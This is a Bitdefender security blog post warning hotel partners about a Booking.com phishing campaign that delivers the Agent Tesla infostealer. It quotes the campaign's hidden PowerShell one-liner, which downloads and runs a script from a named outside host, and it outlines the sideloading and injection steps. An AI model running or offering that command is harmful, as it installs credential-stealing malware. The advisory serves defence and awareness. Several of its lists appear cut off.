
It’s not just hotels, guesthouses and small property owners who are bracing for one of the busiest times of the year ahead of this year’s holiday season. Threat actors are highly active too.
According to Viorel Zavoiu from Bitdefender Antispam Lab, an extensive, ongoing phishing campaign impersonating Booking.com is attempting to trick property partners into running malware on their computers through fake guest complaints, service issues and reservation alerts.
This is not your typical credential-harvesting scam. Attackers have carefully crafted their messages to mirror real Booking.com communication, including spoofed branding, faux “extranet” URLs, and Blogspot redirectors that can make the links look legitimate at first glance. Once the target clicks, they’re guided through a deceptive verification process designed to install malware capable of stealing login credentials and remotely controlling the device.
For small hotels and independent property owners who rely heavily on Booking.com’s extranet during high season, this scam is especially dangerous and extremely convincing.
This malicious email campaign, first spotted in mid-November, launched at the perfect moment. As hotels, guesthouses, and small rental properties move into the busiest travel period of the year, inboxes fill with legitimate Booking.com notifications, last-minute reservation changes, and urgent guest messages. Attackers are taking full advantage of this seasonal pressure.

During November and December:
This creates the ideal backdrop for a phishing operation designed to trigger an immediate reaction. Subject lines like “Booking Guest Complaint Received #5594458883” or “Client Grievance Acknowledged” are almost guaranteed to grab attention when occupancy is high and every minute counts.
Once the recipient opens the email, attackers funnel them through a convincing, spoofed Booking.com extranet page. This is where the real trap begins: the page instructs the user to “verify” their access by running a PowerShell command, which silently downloads and executes a malware loader. That loader eventually deploys Agent Tesla, an infostealer and RAT capable of collecting credentials, keystrokes, screenshots and more.
Top targeted regions include: the UK, US, Germany, Itay, Australia, Ireland, South Africa, Japan and the Netherlands.
According to Bitdefender Labs researcher Raul Vasile Bucur, clicking the link in the email leads to a spoofed Booking.com partner page.

The victim is then shown a fake “Booking Verification” box instructing them to:

This alone is a red flag, since Booking.com never asks anyone to run system commands.
But for stressed hotel staff trying to resolve a supposed urgent guest complaint, it may not look suspicious.
The instruction runs a hidden PowerShell script:
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -Command "iex ((New-Object Net.WebClient).DownloadString('https://buqiwptshpqisy.com/jsyqi20458aq'))"
This script:
The loader pulls:
The attackers use DLL sideloading to make the clean vmtoolsd.exe load their malicious DLL (libintl_gettext).
Final stage: AgentTesla (Infostealer + RAT)
The malware ultimately injects a payload into a memory location via a spawned process (applaunch.exe).
The injected content — Bqqlvpto.exe — is identified as AgentTesla, an infostealer and remote-access trojan capable of:
Once attackers steal extranet credentials, they can:
Smaller properties often:
These conditions make them prime targets.
During peak holiday season, when the volume of legitimate Booking.com communication is at its highest, the chances of falling for a fake complaint or reservation issue skyrocket.
Look out for:
1. Unfamiliar or urgent subject line patterns
All follow a formula such as:
2. Blogspot redirectors
Attackers use *.blogspot.com URLs to cloak malicious links.
3. Requests to run commands
Booking.com never asks partners to:
4. Strange account behavior
If booking notifications stop arriving or you see login attempts from new locations, assume your account may be compromised.
Bitdefender detects and blocks every stage of this attack chain:
✔ Malicious email blocking
Our anti-spam and anti-phishing engines flag the spoofed Booking.com messages early.
✔ PowerShell attack prevention
The malicious script is detected as harmful and blocked before executing.
✔ Malware loader detection
All components, including the loader and secondary-stage files, are recognized as malicious.
✔ AgentTesla detection
Bitdefender’s behavioral and signature-based technologies fully block the final payload.
This means hotels protected by Bitdefender are secured, whether the attack uses:
Harden your logins
Use a password manager, enable two-factor authentication and restrict who can access your Booking.com extranet.
Protect your devices first
Install reputable security software, keep systems updated and block unauthorized scripts.
Verify before reacting to “guest complaints”
Always check the sender email domain and hover over any link before clicking.
Never run commands sent via email
Booking.com does not ask partners to run PowerShell or install verification tools.
Keep guest data and devices separate
Avoid using the same PC for Booking.com extranet access and general browsing.
For small hotels, B&Bs, guesthouses and rental properties, a single compromised device can expose reservation data, payment information and guest communication.
Bitdefender Ultimate Small Business Security provides an easy, all-in-one way to safeguard your extranet accounts, workstations and business-critical operations with:
If your team needs simple, reliable protection built for small businesses, this is the most effective way to stay ahead of threats like Booking.com impersonation scams — especially during the high-risk holiday season.
tags
Alina is a history buff passionate about cybersecurity and anything sci-fi, advocating Bitdefender technologies and solutions. She spends most of her time between her two feline friends and traveling.
View all postsDecember 05, 2025
November 24, 2025
November 18, 2025
November 17, 2025